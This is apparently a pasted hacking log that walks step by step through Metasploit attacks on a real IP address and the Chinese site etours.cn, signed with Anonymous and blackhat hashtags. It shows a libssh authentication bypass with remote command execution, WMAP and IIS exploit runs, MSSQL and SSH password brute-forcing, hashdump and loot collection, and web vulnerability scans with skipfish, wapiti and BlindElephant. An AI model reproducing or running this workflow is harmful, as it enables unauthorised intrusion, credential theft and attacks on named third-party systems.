  3693. root@blackbox:~# msfconsole
  3694.  
  3695. Attempting authentication bypass unpatched libssh
  3696.  
  3697. msf5 > use auxiliary/scanner/ssh/libssh_auth_bypass
  3698. msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > set rhosts 184.154.192.250
  3699. rhosts => IPADDRESS
  3700. msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > set rport 830
  3701. rport => 830
  3702. msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > set spawn_pty true
  3703. spawn_pty => true
  3704. msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > set verbose true
  3705. verbose => true
  3706. msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > run
  3707.  
  3708. msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > sessions -1
  3709. [*] Starting interaction with 1...
  3710.  
  3711. id
  3712.  
  3713. uname -a
  3714.  
  3715. tty
  3716.  
  3717.  
  3718. msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > set action Execute
  3719. action => Execute
  3720. msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > set cmd id; uname -a
  3721. cmd => id; uname -a
  3722. msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > run
  3723.  
  3724.  
  3725.  
  3726. USE WMAP
  3727.  
  3728. msf5 > load wmap
  3729.  
  3730. .-.-.-..-.-.-..---..---.
  3731. | | | || | | || | || |-'
  3732. `-----'`-'-'-'`-^-'`-'
  3733. [WMAP 1.5.1] === et [ ] metasploit.com 2012
  3734. [*] Successfully loaded plugin: wmap
  3735.  
  3736.  
  3737. Clean
  3738. msf5 > wmap_sites -l
  3739.  
  3740. msf5 > wmap_sites -d 0
  3741. msf5 > wmap_targets -c
  3742. msf5 > wmap_targets -l
  3743.  
  3744.  
  3745. ADD THE SITE
  3746.  
  3747. msf5 > wmap_sites -a http://www.etours.cn/
  3748. [*] Site created.
  3749. msf5 > wmap_sites -l
  3750. [*] Available sites
  3751. ===============
  3752.  
  3753. Id Host Vhost Port Proto # Pages # Forms
  3754. -- ---- ----- ---- ----- ------- -------
  3755. 0 184.154.192.250 184.154.192.250 80 http 0 0
  3756.  
  3757. ADD THE TARGET
  3758.  
  3759. msf5 > wmap_targets -t 184.154.192.250
  3760. msf5 > wmap_targets -l
  3761. [*] Defined targets
  3762. ===============
  3763.  
  3764. Id Vhost Host Port SSL Path
  3765. -- ----- ---- ---- --- ----
  3766. 0 184.154.192.250 184.154.192.250 80 false /
  3767.  
  3768.  
  3769.  
  3770. RUN THE TEST
  3771.  
  3772. msf5 > wmap_run -t
  3773. [*] Testing target:
  3774. [*] Site: 184.154.192.250 (184.154.192.250)
  3775. [*] Port: 80 SSL: false
  3776. ============================================================
  3777. [*] Testing started. 2020-01-29 05:09:16 -0600
  3778. [*] Loading wmap modules...
  3779. [*] 39 wmap enabled modules loaded.
  3780. [*]
  3781. =[ SSL testing ]=
  3782. ============================================================
  3783. [*] Target is not SSL. SSL modules disabled.
  3784. [*]
  3785. =[ Web Server testing ]=
  3786. ============================================================
  3787. [*] Module auxiliary/scanner/http/http_version
  3788. [*] Module auxiliary/scanner/http/open_proxy
  3789. [*] Module auxiliary/admin/http/tomcat_administration
  3790. [*] Module auxiliary/admin/http/tomcat_utf8_traversal
  3791. [*] Module auxiliary/scanner/http/drupal_views_user_enum
  3792. [*] Module auxiliary/scanner/http/frontpage_login
  3793. [*] Module auxiliary/scanner/http/host_header_injection
  3794. [*] Module auxiliary/scanner/http/options
  3795. [*] Module auxiliary/scanner/http/robots_txt
  3796. [*] Module auxiliary/scanner/http/scraper
  3797. [*] Module auxiliary/scanner/http/svn_scanner
  3798. [*] Module auxiliary/scanner/http/trace
  3799. [*] Module auxiliary/scanner/http/vhost_scanner
  3800. [*] Module auxiliary/scanner/http/webdav_internal_ip
  3801. [*] Module auxiliary/scanner/http/webdav_scanner
  3802. [*] Module auxiliary/scanner/http/webdav_website_content
  3803. [*]
  3804. =[ File/Dir testing ]=
  3805. ============================================================
  3806. [*] Module auxiliary/scanner/http/backup_file
  3807. [*] Module auxiliary/scanner/http/brute_dirs
  3808. [*] Module auxiliary/scanner/http/copy_of_file
  3809. [*] Module auxiliary/scanner/http/dir_listing
  3810. [*] Module auxiliary/scanner/http/dir_scanner
  3811. [*] Module auxiliary/scanner/http/dir_webdav_unicode_bypass
  3812. [*] Module auxiliary/scanner/http/file_same_name_dir
  3813. [*] Module auxiliary/scanner/http/files_dir
  3814. [*] Module auxiliary/scanner/http/http_put
  3815. [*] Module auxiliary/scanner/http/ms09_020_webdav_unicode_bypass
  3816. [*] Module auxiliary/scanner/http/prev_dir_same_name_file
  3817. [*] Module auxiliary/scanner/http/replace_ext
  3818. [*] Module auxiliary/scanner/http/soap_xml
  3819. [*] Module auxiliary/scanner/http/trace_axd
  3820. [*] Module auxiliary/scanner/http/verb_auth_bypass
  3821. [*]
  3822. =[ Unique Query testing ]=
  3823. ============================================================
  3824. [*] Module auxiliary/scanner/http/blind_sql_query
  3825. [*] Module auxiliary/scanner/http/error_sql_injection
  3826. [*] Module auxiliary/scanner/http/http_traversal
  3827. [*] Module auxiliary/scanner/http/rails_mass_assignment
  3828. [*] Module exploit/multi/http/lcms_php_exec
  3829. [*]
  3830. =[ Query testing ]=
  3831. ============================================================
  3832. [*]
  3833. =[ General testing ]=
  3834. ============================================================
  3835. [*] Done.
  3836.  
  3837.  
  3838.  
  3839. RUN THE EXPLOIT
  3840.  
  3841. msf5 > wmap_run -e
  3842.  
  3843.  
  3844.  
  3845. CHECK THE VULNERABILITIES
  3846.  
  3847. msf5 > wmap_vulns -l
  3848.  
  3849.  
  3850. EXECUTE VULNERABILITIES
  3851.  
  3852. msf > vulns
  3853.  
  3854.  
  3855. RUN DB_NMAP THROUGH METASPLOIT
  3856.  
  3857. msf5 > db_nmap 184.154.192.250 -Pn
  3858.  
  3859.  
  3860. msf5 > hosts
  3861.  
  3862.  
  3863. msf5 > hosts -c address,os_flavor
  3864.  
  3865.  
  3866. msf5 > hosts -c address,os_flavor -S Windows
  3867.  
  3868. msf5 > hosts -c address,os_flavor -S Windows -R
  3869.  
  3870. RHOSTS => 184.154.192.250
  3871.  
  3872. msf5 > services -h
  3873.  
  3874. msf5 > services -c name,info 184.154.192.250
  3875.  
  3876. msf5 > services -c name,info -S http
  3877.  
  3878.  
  3879. msf5 > services -c info,name -p 445
  3880.  
  3881. msf5 > services -c port,proto,state -p 70-81
  3882.  
  3883.  
  3884. msf5 > services -s http -c port 184.154.192.250
  3885.  
  3886. msf5 > search IIS
  3887.  
  3888. msf5 > use exploit/windows/iis/msadc
  3889.  
  3890. msf5 exploit(windows/iis/msadc) > run
  3891.  
  3892. msf5 > search mssql_login
  3893.  
  3894. Matching Modules
  3895. ================
  3896.  
  3897. # Name Disclosure Date Rank Check Description
  3898. - ---- --------------- ---- ----- -----------
  3899. 0 auxiliary/scanner/mssql/mssql_login normal No MSSQL Login Utility
  3900.  
  3901. msf5 > use auxiliary/scanner/mssql/mssql_login
  3902.  
  3903. msf5 auxiliary(scanner/mssql/mssql_login) > show options
  3904.  
  3905. msf5 auxiliary(scanner/mssql/mssql_login) > set USERNAME sa
  3906. msf5 auxiliary(scanner/mssql/mssql_login) > set PASS_FILE /opt/commix/src/txt/passwords_john.txt
  3907. msf5 auxiliary(scanner/mssql/mssql_login) > run
  3908.  
  3909.  
  3910. msf5 auxiliary(scanner/mssql/mssql_login) > creds
  3911. Credentials
  3912. ===========
  3913.  
  3914. host origin service public private realm private_type JtR Format
  3915. ---- ------ ------- ------ ------- ----- ------------ ----------
  3916.  
  3917. msf5 auxiliary(scanner/mssql/mssql_login) > back
  3918. msf5 > loot -h
  3919. Usage: loot [options]
  3920. Info: loot [-h] [addr1 addr2 ...] [-t <type1,type2>]
  3921. Add: loot -f [fname] -i [info] -a [addr1 addr2 ...] -t [type]
  3922. Del: loot -d [addr1 addr2 ...]
  3923.  
  3924. -a,--add Add loot to the list of addresses, instead of listing
  3925. -d,--delete Delete *all* loot matching host and type
  3926. -f,--file File with contents of the loot to add
  3927. -i,--info Info of the loot to add
  3928. -t <type1,type2> Search for a list of types
  3929. -h,--help Show this help information
  3930. -S,--search Search string to filter by
  3931.  
  3932.  
  3933.  
  3934. Here’s an example of how one would populate the database with some ‘loot’.
  3935.  
  3936. msf exploit(usermap_script) > exploit
  3937.  
  3938. msf exploit(usermap_script) > use post/linux/gather/hashdump
  3939.  
  3940. msf post(hashdump) > show options
  3941.  
  3942. msf post(hashdump) > sessions -l
  3943.  
  3944. msf post(hashdump) > run
  3945.  
  3946.  
  3947. USE LOOT
  3948.  
  3949. msf post(hashdump) > loot
  3950.  
  3951. RELOAD ALL METASPLOIT MODULES
  3952.  
  3953. msf > reload_all
  3954.  
  3955. USE ARP_SWEEP
  3956.  
  3957. msf > use auxiliary/scanner/discovery/arp_sweep
  3958.  
  3959. msf auxiliary(arp_sweep) > show options
  3960.  
  3961. msf auxiliary(arp_sweep) > set RHOSTS TARGET/24
  3962.  
  3963. RHOSTS => TARGET/24
  3964.  
  3965. msf auxiliary(arp_sweep) > set THREADS 50
  3966.  
  3967. THREADS => 50
  3968.  
  3969. msf auxiliary(arp_sweep) > run
  3970.  
  3971. USE NMAP
  3972.  
  3973. msf > nmap -sn TARGET/24
  3974.  
  3975. msf > nmap -PU -sn TARGET/24
  3976.  
  3977. msf > nmap -O TARGET
  3978.  
  3979. SEARCH PORTSCAN
  3980.  
  3981. msf > search portscan
  3982.  
  3983. USE PORTSCAN
  3984.  
  3985. msf > use auxiliary/scanner/portscan/syn
  3986.  
  3987. msf auxiliary(syn) > set RHOSTS TARGET
  3988.  
  3989. RHOSTS => TARGET
  3990.  
  3991. msf auxiliary(syn) > set THREADS 200
  3992.  
  3993. THREADS => 200
  3994.  
  3995. msf auxiliary(syn) > run
  3996.  
  3997. SEARCH NAME_VERSION
  3998.  
  3999. msf > search name:_version
  4000.  
  4001. USE TELNET AUXILIARY SCANNER
  4002.  
  4003. msf > use auxiliary/scanner/telnet/telnet_version
  4004.  
  4005. msf auxiliary(telnet_version) > set RHOSTS TARGET/24
  4006.  
  4007. RHOSTS => TARGET/24
  4008.  
  4009. msf auxiliary(telnet_version) > set THREADS 100
  4010.  
  4011. THREADS => 100
  4012.  
  4013. msf auxiliary(telnet_version) > run
  4014.  
  4015. USE AUXILIARY SSH_VERSION
  4016.  
  4017. msf > use auxiliary/scanner/ssh/ssh_version
  4018.  
  4019. msf auxiliary(ssh_version) > show options
  4020.  
  4021. Module options (auxiliary/scanner/ssh/ssh_version):
  4022.  
  4023. Name Current Setting Required Description
  4024.  
  4025. ---- --------------- -------- -----------
  4026.  
  4027. RHOSTS yes The target address range or CIDR identifier
  4028.  
  4029. RPORT 22 yes The target port
  4030.  
  4031. THREADS 1 yes The number of concurrent threads
  4032.  
  4033. TIMEOUT 30 yes Timeout for the SSH probe
  4034.  
  4035. msf auxiliary(ssh_version) > set RHOSTS TARGET/24
  4036.  
  4037. RHOSTS => TARGET/24
  4038.  
  4039. msf auxiliary(ssh_version) > set THREADS 200
  4040.  
  4041. THREADS => 200
  4042.  
  4043. msf auxiliary(ssh_version) > run
  4044.  
  4045. USE ORACLE SCANNER
  4046.  
  4047. msf auxiliary(ssh_version) > use auxiliary/scanner/oracle/tnslsnr_version
  4048.  
  4049. msf auxiliary(tnslsnr_version) > show options
  4050.  
  4051. Module options (auxiliary/scanner/oracle/tnslsnr_version):
  4052.  
  4053. Name Current Setting Required Description
  4054.  
  4055. ---- --------------- -------- -----------
  4056.  
  4057. RHOSTS yes The target address range or CIDR identifier
  4058.  
  4059. RPORT 1521 yes The target port
  4060.  
  4061. THREADS 1 yes The number of concurrent threads
  4062.  
  4063. msf auxiliary(tnslsnr_version) > set RHOSTS TARGET/24
  4064.  
  4065. RHOSTS => TARGET/24
  4066.  
  4067. msf auxiliary(tnslsnr_version) > set THREADS 200
  4068.  
  4069. THREADS => 200
  4070.  
  4071. msf auxiliary(tnslsnr_version) > run
  4072.  
  4073. USE OPEN_PROXY
  4074.  
  4075. msf auxiliary(open_proxy) > show options
  4076.  
  4077. Module options (auxiliary/scanner/http/open_proxy):
  4078.  
  4079. Name Current Setting Required Description
  4080.  
  4081. ---- --------------- -------- -----------
  4082.  
  4083. LOOKUP_PUBLIC_ADDRESS false no Enable test for retrieve public IP address via RIPE.net
  4084.  
  4085. MULTIPORTS true no Multiple ports will be used : 80, 1080, 3128, 8080, 8123
  4086.  
  4087. RANDOMIZE_PORTS false no Randomize the order the ports are probed
  4088.  
  4089. RHOSTS 24.25.24.1-xx.xx.xx.xx.xx yes The target address range or CIDR identifier
  4090.  
  4091. RPORT 8080 yes The target port
  4092.  
  4093. SITE www.google.com yes The web site to test via alleged web proxy (default is www.google.com)
  4094.  
  4095. THREADS 200 yes The number of concurrent threads
  4096.  
  4097. UserAgent Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) yes The HTTP User-Agent sent in the request
  4098.  
  4099. VERIFY_CONNECT true no Enable test for CONNECT method
  4100.  
  4101. VERIFY_HEAD false no Enable test for HEAD method
  4102.  
  4103. ValidCode 200,302 no Valid HTTP code for a successfully request
  4104.  
  4105. ValidPattern server: gws
  4106.  
  4107. USE SSH_LOGIN
  4108.  
  4109. msf > use auxiliary/scanner/ssh/ssh_login
  4110.  
  4111. msf auxiliary(ssh_login) > set RHOSTS TARGET
  4112.  
  4113. RHOSTS => TARGET
  4114.  
  4115. msf auxiliary(ssh_login) > set USERNAME root
  4116.  
  4117. USERNAME => root
  4118.  
  4119. msf auxiliary(ssh_login) > set PASS_FILE /root/password.txt
  4120.  
  4121. PASS_FILE => /root/password.txt
  4122.  
  4123. msf auxiliary(ssh_login) > set THREADS 2000
  4124.  
  4125. THREADS => 2000
  4126.  
  4127. msf auxiliary(ssh_login) > run
  4128.  
  4129. USE AUXILIARY DIR_SCANNER
  4130.  
  4131. msf > use auxiliary/scanner/http/dir_scanner
  4132.  
  4133. msf auxiliary(dir_scanner) > set THREADS 50
  4134.  
  4135. THREADS => 50
  4136.  
  4137. msf auxiliary(dir_scanner) > set RHOSTS TARGET
  4138.  
  4139. RHOSTS => TARGET
  4140.  
  4141. msf auxiliary(dir_scanner) > exploit
  4142.  
  4143. USE EMAIL_COLLECTOR
  4144.  
  4145. msf > use auxiliary/gather/search_email_collector
  4146.  
  4147. msf auxiliary(search_email_collector) > set DOMAIN TARGET
  4148.  
  4149. DOMAIN => TARGET
  4150.  
  4151. msf auxiliary(search_email_collector) > run
  4152.  
  4153. USE AUXILIARY SCANNER HTTP CRAWLER
  4154.  
  4155. msf > use auxiliary/scanner/http/crawler
  4156.  
  4157. msf auxiliary(crawler) > set RHOST TARGET
  4158.  
  4159. RHOST => TARGET
  4160.  
  4161. msf auxiliary(crawler) > run
  4162.  
  4163. [*] Crawling http://TARGET:80/...
  4164.  
  4165. [*] Crawl of http://TARGET:80/ complete
  4166.  
  4167. [*] Auxiliary module execution completed
  4168.  
  4169.  
  4170. openvasad -c add_user -u admin -r Admin
  4171.  
  4172. openvasmd --user=admin --new-password=admin
  4173.  
  4174. openvas_target_create “windows” TARGET “new_scan”
  4175.  
  4176. msf > load openvas
  4177.  
  4178. [*] Welcome to OpenVAS integration by kost and averagesecurityguy.
  4179.  
  4180. [*]
  4181.  
  4182. [*] OpenVAS integration requires a database connection. Once the
  4183.  
  4184. [*] database is ready, connect to the OpenVAS server using openvas_connect.
  4185.  
  4186. [*] For additional commands use openvas_help.
  4187.  
  4188. [*]
  4189.  
  4190. [*] Successfully loaded plugin: OpenVAS
  4191.  
  4192. msf > openvas_connect admin admin localhost 9390 ok
  4193.  
  4194. msf > openvas_help
  4195.  
  4196. [*] openvas_help Display this help
  4197.  
  4198. [*] openvas_debug Enable/Disable debugging
  4199.  
  4200. [*] openvas_version Display the version of the OpenVAS server
  4201.  
  4202. [*]
  4203.  
  4204. [*] CONNECTION
  4205.  
  4206. [*] ==========
  4207.  
  4208. [*] openvas_connect Connects to OpenVAS
  4209.  
  4210. [*] openvas_disconnect Disconnects from OpenVAS
  4211.  
  4212. [*]
  4213.  
  4214. [*] TARGETS
  4215.  
  4216. [*] =======
  4217.  
  4218. [*] openvas_target_create Create target
  4219.  
  4220. [*] openvas_target_delete Deletes target specified by ID
  4221.  
  4222. [*] openvas_target_list Lists targets
  4223.  
  4224. [*]
  4225.  
  4226. [*] TASKS
  4227.  
  4228. [*] =====
  4229.  
  4230. [*] openvas_task_create Create task
  4231.  
  4232. [*] openvas_task_delete Delete a task and all associated reports
  4233.  
  4234. [*] openvas_task_list Lists tasks
  4235.  
  4236. [*] openvas_task_start Starts task specified by ID
  4237.  
  4238. [*] openvas_task_stop Stops task specified by ID
  4239.  
  4240. [*] openvas_task_pause Pauses task specified by ID
  4241.  
  4242. [*] openvas_task_resume Resumes task specified by ID
  4243.  
  4244. [*] openvas_task_resume_or_start Resumes or starts task specified by ID
  4245.  
  4246. [*]
  4247.  
  4248. [*] CONFIGS
  4249.  
  4250. [*] =======
  4251.  
  4252. [*] openvas_config_list Lists scan configurations
  4253.  
  4254. [*]
  4255.  
  4256. [*] FORMATS
  4257.  
  4258. [*] =======
  4259.  
  4260. [*] openvas_format_list Lists available report formats
  4261.  
  4262. [*]
  4263.  
  4264. [*] REPORTS
  4265.  
  4266. [*] =======
  4267.  
  4268. [*] openvas_report_list Lists available reports
  4269.  
  4270. [*] openvas_report_delete Delete a report specified by ID
  4271.  
  4272. [*] openvas_report_import Imports an OpenVAS report specified by ID
  4273.  
  4274. [*] openvas_report_download Downloads an OpenVAS report specified by ID
  4275.  
  4276. msf > openvas_config_list
  4277.  
  4278. /opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/openvas-omp-0.0.4/lib/openvas-omp.rb:201:in `sendrecv': Object#timeout is deprecated, use Timeout.timeout instead.
  4279.  
  4280. [+] OpenVAS list of configs
  4281.  
  4282. ID Name
  4283.  
  4284. -- ----
  4285.  
  4286. 085569ce-73ed-11df-83c3-002264764cea empty
  4287.  
  4288. 2d3f051c-55ba-11e3-bf43-406186ea4fc5 Host Discovery
  4289.  
  4290. 698f691e-7489-11df-9d8c-002264764cea Full and fast ultimate
  4291.  
  4292. 708f25c4-7489-11df-8094-002264764cea Full and very deep
  4293.  
  4294. 74db13d6-7489-11df-91b9-002264764cea Full and very deep ultimate
  4295.  
  4296. 8715c877-47a0-438d-98a3-27c7a6ab2196 Discovery
  4297.  
  4298. bbca7412-a950-11e3-9109-406186ea4fc5 System Discovery
  4299.  
  4300. daba56c8-73ec-11df-a475-002264764cea Full and fast
  4301.  
  4302. msf > openvas_target_list
  4303.  
  4304. /opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/openvas-omp-0.0.4/lib/openvas-omp.rb:201:in `sendrecv': Object#timeout is deprecated, use Timeout.timeout instead.
  4305.  
  4306. [+] OpenVAS list of targets
  4307.  
  4308. ID Name Hosts Max Hosts In Use Comment
  4309.  
  4310. -- ---- ----- --------- ------ -------
  4311.  
  4312. 785ca141-93b1-4325-9117-040dbcd8297f “windows” TARGET 1 0 “new_scan”
  4313.  
  4314. b493b7a8-7489-11df-a3ec-002264764cea Localhost localhost 1 0
  4315.  
  4316.  
  4317. msf > openvas_task_create
  4318.  
  4319. [*] Usage: openvas_task_create <name> <comment> <config_id> <target_id>
  4320.  
  4321. msf > openvas_task_create "win" "test" 2d3f051c-55ba-11e3-bf43-406186ea4fc5 785ca141-93b1-4325-9117-040dbcd8297f
  4322.  
  4323. /opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/openvas-omp-0.0.4/lib/openvas-omp.rb:201:in `sendrecv': Object#timeout is deprecated, use Timeout.timeout instead.
  4324.  
  4325. [*] f93de23e-ed04-4db9-9321-0e40d3c11d46
  4326.  
  4327. /opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/openvas-omp-0.0.4/lib/openvas-omp.rb:201:in `sendrecv': Object#timeout is deprecated, use Timeout.timeout instead.
  4328.  
  4329. [+] OpenVAS list of tasks
  4330.  
  4331. ID Name Comment Status Progress
  4332.  
  4333. -- ---- ------- ------ --------
  4334.  
  4335. f93de23e-ed04-4db9-9321-0e40d3c11d46 win test New -1
  4336.  
  4337. msf > openvas_task_start f93de23e-ed04-4db9-9321-0e40d3c11d46
  4338.  
  4339. /opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/openvas-omp-0.0.4/lib/openvas-omp.rb:201:in `sendrecv': Object#timeout is deprecated, use Timeout.timeout instead.
  4340.  
  4341. [*] <X><authenticate_response status='200' status_text='OK'><role>Admin</role><timezone>UTC</timezone><severity>nist</severity></authenticate_response><start_task_response status='202' status_text='OK, request submitted'><report_id>68e8a43f-8f06-4bc4-92a3-1fec76ea246b</report_id></start_task_response></X>
  4342.  
  4343.  
  4344. msf > openvas_task_list
  4345.  
  4346. /opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/openvas-omp-0.0.4/lib/openvas-omp.rb:201:in `sendrecv': Object#timeout is deprecated, use Timeout.timeout instead.
  4347.  
  4348. [+] OpenVAS list of tasks
  4349.  
  4350. ID Name Comment Status Progress
  4351.  
  4352. -- ---- ------- ------ --------
  4353.  
  4354. f93de23e-ed04-4db9-9321-0e40d3c11d46 win test Done -1
  4355.  
  4356. msf >
  4357.  
  4358. openvas_report_list
  4359.  
  4360. openvas_format_list
  4361.  
  4362. openvas_report_download 1 5 /root/Desktop report
  4363.  
  4364.  
  4365. CHECK THE SITE WITH SKIPFISH
  4366.  
  4367. root@blackbox:~# locate skipfish | grep bin
  4368. /usr/bin/skipfish
  4369. root@blackbox:~# locate dictionaries
  4370.  
  4371.  
  4372. root@blackbox:~# skipfish -S /usr/share/skipfish/dictionaries/complete.wl -o /tmp/scan http://etours.cn
  4373.  
  4374. EXAMPLES
  4375.  
  4376. Scan type: config
  4377.  
  4378. skipfish --config config/example.conf http://example.com
  4379.  
  4380. Scan type: quick
  4381.  
  4382. skipfish -o output/dir/ http://example.com
  4383.  
  4384. Scan type: extensive bruteforce
  4385.  
  4386. skipfish [...other options..] -S dictionaries/complete.wl
  4387.  
  4388. http://example.com
  4389.  
  4390. Scan type: without bruteforcing
  4391.  
  4392. skipfish [...other options..] -LY http://example.com
  4393.  
  4394. Scan type: authenticated (basic)
  4395.  
  4396. skipfish [...other options..] -A username:password http://example.com
  4397.  
  4398. Scan type: authenticated (cookie)
  4399.  
  4400. skipfish [...other options..] -C jsession=myauthcookiehere -X /logout
  4401.  
  4402. http://example.com
  4403.  
  4404. Scan type: flaky server
  4405.  
  4406. skipfish [...other options..] -l 5 -g 2 -t 30 -i 15 http://example.com
  4407.  
  4408. OPEN SKIPFISH RESULTS WITH FIREFOX
  4409.  
  4410. In terminal:
  4411.  
  4412. Report
  4413.  
  4414. ------
  4415.  
  4416. A report has been generated in the file /tmp/scan_report
  4417.  
  4418. Open /tmp/scan_report/index.html with a browser to see this report
  4419.  
  4420.  
  4421. CHECK THE SITE WITH WAPITI
  4422.  
  4423. root@blackbox:~# aptitude install wapiti
  4424.  
  4425. root@blackbox:~# wapiti --url http://etours.cn/ --scope folder -v 1 -f html -o /tmp/scan_report
  4426.  
  4427.  
  4428. USE BLINDELEPHANT
  4429.  
  4430. root@blackbox:~# cd /opt/
  4431. root@blackbox:/opt# git clone https://github.com/lokifer/BlindElephant.git
  4432. root@blackbox:/opt# cd BlindElephant/src/
  4433. root@blackbox:/opt/BlindElephant/src# python setup.py install
  4434.  
  4435. root@blackbox:/opt/BlindElephant/src# BlindElephant.py etours.cn movabletype
  4436.  
  4437. root@blackbox:/opt/BlindElephant/src# BlindElephant.py etours.cn guess
  4438.  
  4439. Probing...
  4440.  
  4441. ACUNETIX SCAN
  4442. https://pasteboard.co/ISeK7WC.jpg
  4443.  
  4444. https://pasteboard.co/ISeKyZk.jpg
  4445.  
  4446. #Anonymous #TheCreed #blackhat_global #GBN
  4447. ========================================================================================================================================================
  4448. ###########################################################################################################################################################
Advertisement
Add Comment
Please, Sign In to add comment